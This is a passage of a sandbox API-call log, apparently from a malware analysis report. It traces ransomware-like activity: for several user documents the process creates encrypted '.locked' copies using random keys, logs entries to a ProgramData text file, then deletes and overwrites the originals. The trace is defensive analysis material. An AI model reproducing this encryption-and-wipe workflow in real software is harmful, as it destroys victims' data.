lpNumberOfBytesWritten=0x1235fe64, lpOverlapped=0x0 | out: lpBuffer=0x1263c060*, lpNumberOfBytesWritten=0x1235fe64*=0x2e, lpOverlapped=0x0) returned 1 [0262.904] CloseHandle (hObject=0x1bc) returned 1 [0262.906] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\_273Oz.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\_273oz.mp3")) returned 1 [0262.979] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\_273Oz.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\_273oz.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0263.017] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0265.788] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x1235fe88 | out: lpMode=0x1235fe88) returned 0 [0265.788] SetEvent (hEvent=0x20c) returned 1 [0265.788] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0269.701] SetEvent (hEvent=0x14c) returned 1 [0269.701] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0269.808] SetEvent (hEvent=0x22c) returned 1 [0269.808] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0270.069] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0299.736] SetEvent (hEvent=0x214) returned 1 [0299.736] SetEvent (hEvent=0x21c) returned 1 [0299.736] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0299.743] SetEvent (hEvent=0x214) returned 1 [0299.743] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0299.745] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12663a24, lpReserved=0x0 | out: lpBuffer=0x125fc000*, lpNumberOfCharsWritten=0x12663a24*=0xb) returned 1 [0299.759] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0299.842] SetEvent (hEvent=0x104) returned 1 [0299.842] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0299.853] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0299.899] SetEvent (hEvent=0x21c) returned 1 [0299.899] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0299.971] SetEvent (hEvent=0x198) returned 1 [0299.971] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0300.450] SetEvent (hEvent=0x1b8) returned 1 [0300.451] SetEvent (hEvent=0x1dc) returned 1 [0300.451] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0300.652] SetEvent (hEvent=0x20c) returned 1 [0300.652] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0300.659] SetEvent (hEvent=0x214) returned 1 [0300.659] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0300.673] SetEvent (hEvent=0x20c) returned 1 [0300.673] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0300.710] SetEvent (hEvent=0x12c) returned 1 [0300.710] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0301.517] SetEvent (hEvent=0x198) returned 1 [0301.517] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0301.528] SetEvent (hEvent=0x1b8) returned 1 [0301.528] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0302.198] SetEvent (hEvent=0x12c) returned 1 [0302.198] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0302.229] SetEvent (hEvent=0x134) returned 1 [0302.229] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0302.544] SetEvent (hEvent=0x1b8) returned 1 [0302.544] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0302.698] SetEvent (hEvent=0x20c) returned 1 [0302.698] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0303.048] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\7NGgJCF9p1sXP7bTM6Xc.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\7nggjcf9p1sxp7btm6xc.odp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0303.048] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x1261fd9c | out: lpMode=0x1261fd9c) returned 0 [0303.048] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\7NGgJCF9p1sXP7bTM6Xc.odp.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\7nggjcf9p1sxp7btm6xc.odp.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0303.771] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0303.789] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x1261fd9c | out: lpMode=0x1261fd9c) returned 0 [0303.789] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c200 | out: pbBuffer=0x1234c200) returned 1 [0303.789] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8080 | out: pbBuffer=0x124a8080) returned 1 [0303.790] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714181 | out: pbBuffer=0x12714181) returned 1 [0303.790] WriteFile (in: hFile=0x1e0, lpBuffer=0x126c7000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1261fd78, lpOverlapped=0x0 | out: lpBuffer=0x126c7000*, lpNumberOfBytesWritten=0x1261fd78*=0x80, lpOverlapped=0x0) returned 1 [0303.797] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x102 [0303.800] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0303.800] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33cefb30, ulCount=0x10, ulNumEntriesRemoved=0x33cefb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33cefb30, ulNumEntriesRemoved=0x33cefb10) returned 0 [0303.800] SetEvent (hEvent=0x134) returned 1 [0303.800] SetEvent (hEvent=0x1dc) returned 1 [0303.800] SetEvent (hEvent=0x12c) returned 1 [0303.800] ReadFile (in: hFile=0x218, lpBuffer=0x12f84000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1261fd68, lpOverlapped=0x0 | out: lpBuffer=0x12f84000*, lpNumberOfBytesRead=0x1261fd68*=0x4d0f, lpOverlapped=0x0) returned 1 [0303.802] WriteFile (in: hFile=0x1e0, lpBuffer=0x12f84000*, nNumberOfBytesToWrite=0x4d0f, lpNumberOfBytesWritten=0x1261fd74, lpOverlapped=0x0 | out: lpBuffer=0x12f84000*, lpNumberOfBytesWritten=0x1261fd74*=0x4d0f, lpOverlapped=0x0) returned 1 [0303.822] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0303.854] SetEvent (hEvent=0x198) returned 1 [0303.854] ReadFile (in: hFile=0x218, lpBuffer=0x12f84000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1261fd68, lpOverlapped=0x0 | out: lpBuffer=0x12f84000*, lpNumberOfBytesRead=0x1261fd68*=0x0, lpOverlapped=0x0) returned 1 [0303.854] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0303.923] CloseHandle (hObject=0x1e0) returned 1 [0303.930] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0304.143] CloseHandle (hObject=0x218) returned 1 [0304.143] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0304.143] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x1261fe94 | out: lpMode=0x1261fe94) returned 0 [0304.143] WriteFile (in: hFile=0x218, lpBuffer=0x126d02a0*, nNumberOfBytesToWrite=0x57, lpNumberOfBytesWritten=0x1261fe64, lpOverlapped=0x0 | out: lpBuffer=0x126d02a0*, lpNumberOfBytesWritten=0x1261fe64*=0x57, lpOverlapped=0x0) returned 1 [0304.145] CloseHandle (hObject=0x218) returned 1 [0304.146] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\7NGgJCF9p1sXP7bTM6Xc.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\7nggjcf9p1sxp7btm6xc.odp")) returned 1 [0304.164] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0304.387] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\7NGgJCF9p1sXP7bTM6Xc.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\7nggjcf9p1sxp7btm6xc.odp"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0304.528] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0304.720] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x1261fe88 | out: lpMode=0x1261fe88) returned 0 [0304.720] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x102 [0304.731] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0304.731] SetEvent (hEvent=0x214) returned 1 [0304.731] SetEvent (hEvent=0x21c) returned 1 [0304.732] SetEvent (hEvent=0x134) returned 1 [0304.732] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0304.733] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33cefb34, ulCount=0x10, ulNumEntriesRemoved=0x33cefb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33cefb34, ulNumEntriesRemoved=0x33cefb14) returned 0 [0304.733] SetEvent (hEvent=0x134) returned 1 [0304.734] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\v4ns79y.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\v4ns79y.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0304.771] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0304.772] SetEvent (hEvent=0x21c) returned 1 [0304.772] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x12625e88 | out: lpMode=0x12625e88) returned 0 [0304.772] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0304.807] SetEvent (hEvent=0x1dc) returned 1 [0304.807] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0304.807] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0304.867] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0304.886] SetEvent (hEvent=0x12c) returned 1 [0304.886] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x102 [0305.020] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0305.020] SetEvent (hEvent=0x214) returned 1 [0305.020] SetEvent (hEvent=0x134) returned 1 [0305.020] SetEvent (hEvent=0x190) returned 1 [0305.020] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0305.024] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33cefb34, ulCount=0x10, ulNumEntriesRemoved=0x33cefb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33cefb34, ulNumEntriesRemoved=0x33cefb14) returned 0 [0305.024] SetEvent (hEvent=0x150) returned 1 [0305.024] SetEvent (hEvent=0x134) returned 1 [0305.024] SetEvent (hEvent=0x190) returned 1 [0305.024] SetEvent (hEvent=0x214) returned 1 [0305.024] WriteFile (in: hFile=0x1a4, lpBuffer=0x12b78000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125dee78, lpOverlapped=0x0 | out: lpBuffer=0x12b78000*, lpNumberOfBytesWritten=0x125dee78*=0xfa000, lpOverlapped=0x0) returned 1 [0305.046] CloseHandle (hObject=0x1a4) returned 1 [0305.067] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\v4ns79y.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\v4ns79y.pptx")) returned 1 [0305.182] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x1261fa24, lpReserved=0x0 | out: lpBuffer=0x125fc000*, lpNumberOfCharsWritten=0x1261fa24*=0xb) returned 1 [0305.192] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\LbcN3M.odt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\lbcn3m.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0305.192] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x1261fd9c | out: lpMode=0x1261fd9c) returned 0 [0305.192] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\LbcN3M.odt.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\lbcn3m.odt.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0305.192] GetConsoleMode (in: hConsoleHandle=0x208, lpMode=0x1261fd9c | out: lpMode=0x1261fd9c) returned 0 [0305.192] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc020 | out: pbBuffer=0x125fc020) returned 1 [0305.193] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12392040 | out: pbBuffer=0x12392040) returned 1 [0305.193] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0305.193] WriteFile (in: hFile=0x208, lpBuffer=0x1264d000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1261fd78, lpOverlapped=0x0 | out: lpBuffer=0x1264d000*, lpNumberOfBytesWritten=0x1261fd78*=0x80, lpOverlapped=0x0) returned 1 [0305.195] ReadFile (in: hFile=0x1c8, lpBuffer=0x1532e000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1261fd68, lpOverlapped=0x0 | out: lpBuffer=0x1532e000*, lpNumberOfBytesRead=0x1261fd68*=0x165ba, lpOverlapped=0x0) returned 1 [0305.199] WriteFile (in: hFile=0x208, lpBuffer=0x1532e000*, nNumberOfBytesToWrite=0x165ba, lpNumberOfBytesWritten=0x1261fd74, lpOverlapped=0x0 | out: lpBuffer=0x1532e000*, lpNumberOfBytesWritten=0x1261fd74*=0x165ba, lpOverlapped=0x0) returned 1 [0305.249] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0305.623] ReadFile (in: hFile=0x1c8, lpBuffer=0x1532e000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1261fd68, lpOverlapped=0x0 | out: lpBuffer=0x1532e000*, lpNumberOfBytesRead=0x1261fd68*=0x0, lpOverlapped=0x0) returned 1 [0305.625] CloseHandle (hObject=0x208) returned 1 [0305.632] CloseHandle (hObject=0x1c8) returned 1 [0305.633] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0305.633] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x1261fe94 | out: lpMode=0x1261fe94) returned 0 [0305.633] WriteFile (in: hFile=0x1c8, lpBuffer=0x1264a1c0*, nNumberOfBytesToWrite=0x35, lpNumberOfBytesWritten=0x1261fe64, lpOverlapped=0x0 | out: lpBuffer=0x1264a1c0*, lpNumberOfBytesWritten=0x1261fe64*=0x35, lpOverlapped=0x0) returned 1 [0305.633] CloseHandle (hObject=0x1c8) returned 1 [0305.635] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\LbcN3M.odt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\lbcn3m.odt")) returned 1 [0305.662] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x0 [0305.688] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33cefb30, ulCount=0x10, ulNumEntriesRemoved=0x33cefb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33cefb30, ulNumEntriesRemoved=0x33cefb10) returned 0 [0305.689] SetEvent (hEvent=0x150) returned 1 [0305.689] SetEvent (hEvent=0x1e8) returned 1 [0305.689] SetEvent (hEvent=0x20c) returned 1 [0305.689] SetEvent (hEvent=0x220) returned 1 [0305.695] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x102 [0305.712] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0305.712] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x102 [0305.742] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0305.742] SetEvent (hEvent=0x190) returned 1 [0305.742] SetEvent (hEvent=0x220) returned 1 [0305.742] SetEvent (hEvent=0x20c) returned 1 [0305.742] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0305.746] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33cefb34, ulCount=0x10, ulNumEntriesRemoved=0x33cefb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33cefb34, ulNumEntriesRemoved=0x33cefb14) returned 0 [0305.746] SetEvent (hEvent=0x150) returned 1 [0305.746] SetEvent (hEvent=0x220) returned 1 [0305.746] SetEvent (hEvent=0x20c) returned 1 [0305.746] SetEvent (hEvent=0x190) returned 1 [0305.757] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\LbcN3M.odt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\lbcn3m.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0305.769] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0305.856] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x1261fe88 | out: lpMode=0x1261fe88) returned 0 [0305.856] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0306.065] SetEvent (hEvent=0x1ac) returned 1 [0306.065] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0306.067] SetEvent (hEvent=0x1e8) returned 1 [0306.067] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0306.069] SetEvent (hEvent=0x14c) returned 1 [0306.069] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0306.225] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x0 [0306.234] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33cefb30, ulCount=0x10, ulNumEntriesRemoved=0x33cefb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33cefb30, ulNumEntriesRemoved=0x33cefb10) returned 0 [0306.234] SetEvent (hEvent=0x150) returned 1 [0306.234] SetEvent (hEvent=0x1ac) returned 1 [0306.234] SetEvent (hEvent=0x21c) returned 1 [0306.234] SetEvent (hEvent=0x1b8) returned 1 [0306.235] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x102 [0306.237] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0306.237] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x0 [0306.239] SetEvent (hEvent=0x12c) returned 1 [0306.239] SetEvent (hEvent=0x1b8) returned 1 [0306.239] SetEvent (hEvent=0x21c) returned 1 [0306.239] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0306.255] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33cefb34, ulCount=0x10, ulNumEntriesRemoved=0x33cefb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33cefb34, ulNumEntriesRemoved=0x33cefb14) returned 0 [0306.255] SetEvent (hEvent=0x150) returned 1 [0306.255] SetEvent (hEvent=0x1b8) returned 1 [0306.255] SetEvent (hEvent=0x21c) returned 1 [0306.255] SetEvent (hEvent=0x12c) returned 1 [0306.316] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\THfi.ppt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\thfi.ppt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0306.384] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0306.622] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x12663e88 | out: lpMode=0x12663e88) returned 0 [0306.622] WriteFile (in: hFile=0x1b0, lpBuffer=0x13858000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x12663e78, lpOverlapped=0x0 | out: lpBuffer=0x13858000*, lpNumberOfBytesWritten=0x12663e78*=0xfa000, lpOverlapped=0x0) returned 1 [0306.653] CloseHandle (hObject=0x1b0) returned 1 [0306.776] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0306.803] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\THfi.ppt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\thfi.ppt")) returned 1 [0306.989] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0307.094] SetEvent (hEvent=0x190) returned 1 [0307.094] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0307.111] SetEvent (hEvent=0x12c) returned 1 [0307.111] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0307.173] SetEvent (hEvent=0x21c) returned 1 [0307.173] SetEvent (hEvent=0x1ac) returned 1 [0307.173] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0307.201] SetEvent (hEvent=0x21c) returned 1 [0307.201] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0307.211] SetEvent (hEvent=0x214) returned 1 [0307.211] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0307.334] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12669a24, lpReserved=0x0 | out: lpBuffer=0x1263e000*, lpNumberOfCharsWritten=0x12669a24*=0xb) returned 1 [0307.343] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\shxQYJ mAX35K2VsG.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\shxqyj max35k2vsg.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0307.344] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x12669d9c | out: lpMode=0x12669d9c) returned 0 [0307.344] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\shxQYJ mAX35K2VsG.xlsx.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\shxqyj max35k2vsg.xlsx.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0307.363] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0307.693] GetConsoleMode (in: hConsoleHandle=0x228, lpMode=0x12669d9c | out: lpMode=0x12669d9c) returned 0 [0307.693] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390020 | out: pbBuffer=0x12390020) returned 1 [0307.693] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12392110 | out: pbBuffer=0x12392110) returned 1 [0307.694] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c281 | out: pbBuffer=0x1237c281) returned 1 [0307.694] WriteFile (in: hFile=0x228, lpBuffer=0x13835000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12669d78, lpOverlapped=0x0 | out: lpBuffer=0x13835000*, lpNumberOfBytesWritten=0x12669d78*=0x80, lpOverlapped=0x0) returned 1 [0307.697] ReadFile (in: hFile=0x180, lpBuffer=0x1721e000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12669d68, lpOverlapped=0x0 | out: lpBuffer=0x1721e000*, lpNumberOfBytesRead=0x12669d68*=0x6f2, lpOverlapped=0x0) returned 1 [0307.698] WriteFile (in: hFile=0x228, lpBuffer=0x13835000*, nNumberOfBytesToWrite=0x6f2, lpNumberOfBytesWritten=0x12669d78, lpOverlapped=0x0 | out: lpBuffer=0x13835000*, lpNumberOfBytesWritten=0x12669d78*=0x6f2, lpOverlapped=0x0) returned 1 [0307.704] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0307.851] ReadFile (in: hFile=0x180, lpBuffer=0x1721e000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12669d68, lpOverlapped=0x0 | out: lpBuffer=0x1721e000*, lpNumberOfBytesRead=0x12669d68*=0x0, lpOverlapped=0x0) returned 1 [0307.852] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0308.174] CloseHandle (hObject=0x228) returned 1 [0308.176] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0308.365] CloseHandle (hObject=0x180) returned 1 [0308.365] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0308.366] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x1276ee94 | out: lpMode=0x1276ee94) returned 0 [0308.366] SetEvent (hEvent=0x20c) returned 1 [0308.366] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0308.372] 